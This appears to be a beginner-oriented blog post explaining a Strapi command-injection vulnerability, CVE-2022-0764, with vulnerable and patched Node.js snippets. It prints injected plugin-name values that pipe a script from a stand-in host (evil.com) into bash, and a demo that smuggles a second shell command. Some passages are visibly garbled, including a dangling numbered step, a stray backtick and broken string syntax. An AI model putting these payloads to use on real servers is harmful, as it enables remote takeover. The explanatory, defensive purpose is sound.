CVE-2022-0764 - Arbitrary Command Injection in Strapi (Prior to 4.1.) – How it Works, Exploit Details, and Protection

If you’re running a website or an app that uses Strapi, be careful! A major vulnerability, CVE-2022-0764, was found that could allow an attacker to run any command they want on your server. In this post, I’ll explain what happened, how it works (including sample code), links to original references, and what you can do to fix it.

What is Strapi?

For those new to the tech, Strapi is an open-source headless CMS built with Node.js. It’s used for building APIs quickly and is popular because it’s flexible and easy to use.

About CVE-2022-0764

In March 2022, researchers found a critical vulnerability in Strapi, specifically in the code base before version 4.1.. It allows an attacker to exploit the admin panel and make the server execute *arbitrary commands*. This means the attacker can do anything your server can do: install malware, steal data, or destroy your service.

- CVE record: NVD - CVE-2022-0764
- Strapi security advisory: GitHub Advisory Database GHSA-993q-x46g-pgrw

How the Exploit Works

The vulnerability is in how Strapi processes user input in the admin panel for plugin installation. When an administrator installs a plugin from the marketplace, Strapi runs a shell command with the plugin’s name as input. *But it doesn’t sanitize the name*, so an attacker who can control this input (for example, via an admin session) could inject malicious commands.

The underlying problem was in this kind of pattern

const exec = require('child_process').exec;
// bad: user input directly used in shell command
exec('npm install ' + pluginName, (err, stdout, stderr) => {
  //...
});

Here, if pluginName is not properly sanitized, an attacker could pass something malicious like

strapi-plugin-good; curl http://evil.com/pwn.sh | bash

So the full command becomes

npm install strapi-plugin-good; curl http://evil.com/pwn.sh | bash

The shell will execute both npm install strapi-plugin-goodand the attacker’s shell script!

`

strapi-plugin-fake; curl http://evil.com/payload.sh | bash

Server executes command, running both legitimate and malicious commands.

5. Malicious script from evil.com is executed with *same privileges as Strapi*, potentially taking over the server.

*Note: In many real-life attacks, hackers combine this misfeature with social engineering, or chaining with other vulnerabilities to get admin credentials.*

Here’s a simple example (for demonstration only)

const { exec } = require('child_process');
const userPluginName = "strapi-plugin-demo; touch /tmp/hacked";

// Simulate plugin installation
exec('npm install ' + userPluginName, (error, stdout, stderr) => {
  if (error) {
    console.error(Error: ${error.message});
    return;
  }
  console.log(stdout: ${stdout});
});

After running, your server will create a file /tmp/hacked, proving code execution!

The patched code now escapes or validates the plugin name to prevent command injection

// Use array splits to avoid shell; or, validate/sanitize input
execFile('npm', ['install', safePluginName], callback);

References

- NVD: CVE-2022-0764
- GitHub Advisory Database: GHSA-993q-x46g-pgrw
- Official Strapi Issue
- Strapi changelog

Conclusion

CVE-2022-0764 is a serious vulnerability in Strapi that can let attackers run any command on your server if you’re not patched. Update today and always sanitize inputs in your own Node.js code! If you found this helpful or need more guidance, feel free to reach out.

Stay safe,  
Your Security Buddy


*(This is an exclusive, beginner-friendly summary tailored for easy understanding.)*

Timeline

Published on: 02/26/2022 15:15:00 UTC
Last modified on: 07/22/2022 10:28:00 UTC